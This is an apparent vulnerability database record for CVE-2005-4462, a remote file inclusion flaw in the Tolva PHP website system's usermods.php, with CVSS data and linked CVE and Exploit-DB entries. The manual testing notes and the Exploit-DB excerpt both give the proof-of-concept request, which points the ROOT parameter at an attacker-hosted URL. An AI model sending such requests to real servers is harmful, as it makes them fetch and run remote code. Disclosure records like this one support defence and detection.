ID OSVDB:22164
Type osvdb
Reporter OSVDB
Modified 2005-12-21T22:00:36
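Description
PHP remote file include in usermods.php of Tolva PHP website system 0.1.0 (CVE-2005-4462): a URL passed in the ROOT parameter is included and executed in the context of the web server process.
Manual Testing Notes
http://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]
In web server access logs this appears as a request to usermods.php whose ROOT parameter holds an absolute URL. This entry lists no fixed version or vendor patch.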
References:
Vendor URL: http://sourceforge.net/projects/twebs
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0253.html
CVE-2005-4462
Bugtraq ID: 16000
{"type": "osvdb", "published": "2005-12-21T22:00:36", "href": "https://vulners.com/osvdb/OSVDB:22164", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Tolva PHP website system usermods.php ROOT Variable Remote File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-04-28T13:20:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-4462"]}, {"type": "exploitdb", "idList": ["EDB-ID:26921"]}], "modified": "2017-04-28T13:20:19", "rev": 2}, "vulnersScore": 6.2}, "references": [], "id": "OSVDB:22164", "lastseen": "2017-04-28T13:20:19", "cvelist": ["CVE-2005-4462"], "modified": "2005-12-21T22:00:36", "description": "## Manual Testing Notes\nhttp://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]\n## References:\nVendor URL: http://sourceforge.net/projects/twebs\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0253.html\n[CVE-2005-4462](https://vulners.com/cve/CVE-2005-4462)\nBugtraq ID: 16000\n"}
{"cve": [{"lastseen": "2021-02-02T05:24:40", "description": "PHP remote file include vulnerability in usermods.php in Tolva PHP website system 0.1.0 allows remote attackers to execute arbitrary code via a URL in the ROOT parameter.", "edition": 4, "cvss3": {}, "published": "2005-12-21T22:03:00", "title": "CVE-2005-4462", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4462"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:tolva:tolva:0.1.0"], "id": "CVE-2005-4462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4462", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tolva:tolva:0.1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T04:42:00", "description": "Tolva 0.1 Usermods.PHP Remote File Include Vulnerability. CVE-2005-4462. Webapps exploit for php platform", "published": "2005-12-21T00:00:00", "type": "exploitdb", "title": "Tolva 0.1 Usermods.PHP Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4462"], "modified": "2005-12-21T00:00:00", "id": "EDB-ID:26921", "href": "https://www.exploit-db.com/exploits/26921/", "sourceData": "source: http://www.securityfocus.com/bid/16000/info\r\n\r\nTolva is prone to a remote file-include vulnerability.\r\n\r\nAn attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. 
This may help the attacker compromise the application and the underlying system; other attacks are also possible. \r\n\r\nhttp://www.example.com/twebs/modules/misc/usermods.php?ROOT=http://www.example.com ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26921/"}]}